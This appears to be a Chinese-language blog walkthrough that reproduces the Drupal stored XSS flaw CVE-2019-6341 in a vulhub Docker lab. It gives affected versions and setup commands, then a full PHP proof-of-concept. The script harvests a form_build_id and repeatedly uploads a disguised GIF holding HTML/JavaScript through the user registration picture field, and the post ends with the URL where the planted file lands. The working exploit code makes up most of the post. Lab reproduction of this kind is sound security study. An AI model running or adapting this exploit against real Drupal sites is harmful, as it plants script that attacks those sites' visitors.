Drupal XSS漏洞(CVE-2019-6341)

声明

好好学习,天天向上

漏洞描述

Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。

影响范围

在7.65之前的Drupal 7版本中

8.6.13之前的Drupal 8.6版本

8.5.14之前的Drupal 8.5版本

复现过程

这里使用8.5.0版本

使用vulhub

/app/vulhub-master/drupal/CVE-2019-6341

使用docker启动

docker-compose build
docker-compose up -d

启动后进入docker,需要改一些东西,不然安装不成功,进入docker后(默认在/var/www/html下),执行

mkdir sites/default/files
cp ./sites/default/default.settings.php ./sites/default/settings.php
chown -R www-data:www-data ../html/

访问,就不会报错了

http://192.168.239.129:8080

将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。

该漏洞需要利用drupal文件模块上传文件的漏洞,伪造一个图片文件,上传,文件的内容实际是一段HTML代码,内嵌JS,这样其他用户在访问这个链接时,就可能触发XSS漏洞。

Drupal 的图片默认存储位置为 /sites/default/files/pictures//,默认存储名称为其原来的名称,所以之后在利用漏洞时,可以知道上传后的图片的具体位置。

PoC地址

https://github.com/thezdi/PoC/tree/master/Drupal

如图,输入如下命令,即可使用PoC构造样本并完成上传功能,第一个参数为目标IP 第二个参数为目标端口。

执行,当然需要改一下源码,源码里面26行,把端口改成80了,我们只需要进去php,搜索80把端口改成8080,即可,我是把端口,改成命令行第二个参数了

php blog-poc.php 192.168.239.129 8080

我的poc



Date: 1 March 2019
Exploit Author: TrendyTofu
Original Discoverer: Sam Thomas
Version: <= Drupal 8.6.2
Tested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.
Tested not wokring on: Drupal running on MacOS with APFS
CVE : CVE-2019-6341
Reference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/

*/

$host = $argv[1];
$port = $argv[2];

$pk =   "GET /user/register HTTP/1.1\r\n".
	"Host: ".$host."\r\n".
	"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
	"Accept-Language: en-US,en;q=0.5\r\n".
	"Referer: http://".$host."/user/login\r\n".
	"Connection: close\r\n\r\n";

$fp = fsockopen($host,$port,$e,$err,1);
if (!$fp) {die("not connected");}
fputs($fp,$pk);
$out="";
while (!feof($fp)){
  $out.=fread($fp,1);
}
fclose($fp);

preg_match('/name="form_build_id" value="(.*)"/', $out, $match);
$formid = $match[1];
//var_dump($formid);
//echo "form id is:". $formid;
//echo $out."\n";
sleep(1);

$data = 
"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\r\n".
"Connection: close\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"mail\"\r\n".
"\r\n".
"[email protected]\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"name\"\r\n".
"\r\n".
"test2345\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"files[user_picture_0]\"; filename=\"xxx\xc0.gif\"\r\n".
"Content-Type: image/gif\r\n".
"\r\n".
"GIF\r\n".
"\r\n".
"	\r\n".
"		\r\n".
"	\r\n".
"	\r\n".
"	\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n".
"\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"form_build_id\"\r\n".
"\r\n".
//"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\r\n".
$formid."\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"form_id\"\r\n".
"\r\n".
"user_register_form\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"contact\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"timezone\"\r\n".
"\r\n".
"America/New_York\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_triggering_element_name\"\r\n".
"\r\n".
"user_picture_0_upload_button\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_triggering_element_value\"\r\n".
"\r\n".
"Upload\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"_drupal_ajax\"\r\n".
"\r\n".
"1\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[theme]\"\r\n".
"\r\n".
"bartik\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[theme_token]\"\r\n".
"\r\n".
"\r\n".
"-----------------------------60928216114129559951791388325\r\n".
"Content-Disposition: form-data; name=\"ajax_page_state[libraries]\"\r\n".
"\r\n".
"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\r\n".
"-----------------------------60928216114129559951791388325--\r\n";

$pk = 	"POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n".
	"Host: ".$host."\r\n".
	"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n".
	"Accept: application/json, text/javascript, */*; q=0.01\r\n".
	"Accept-Language: en-US,en;q=0.5\r\n".
	"X-Requested-With: XMLHttpRequest\r\n".
	"Referer: http://" .$host. "/user/register\r\n".
	"Content-Length: ". strlen($data). "\r\n".
	$data;

echo "uploading file, please wait...\n";

for ($i =1; $i <= 2; $i++){
$fp = fsockopen($host,$port,$e,$err,1);
if (!$fp) {die("not connected");}
fputs($fp,$pk);
$out="";
while (!feof($fp)){
  $out.=fread($fp,1);
}
fclose($fp);

echo "Got ".$i."/2 500 errors\n";
//echo $out."\n";
sleep(1);
}

echo "please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\n";

?>

Drupal XSS漏洞(CVE-2019-6341)_第1张图片

执行完后,访问

http://192.168.239.129:8080/sites/default/files/pictures/2020-12/_0

Drupal XSS漏洞(CVE-2019-6341)_第2张图片

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down

你可能感兴趣的:(中间件漏洞复现,drupal,安全漏洞)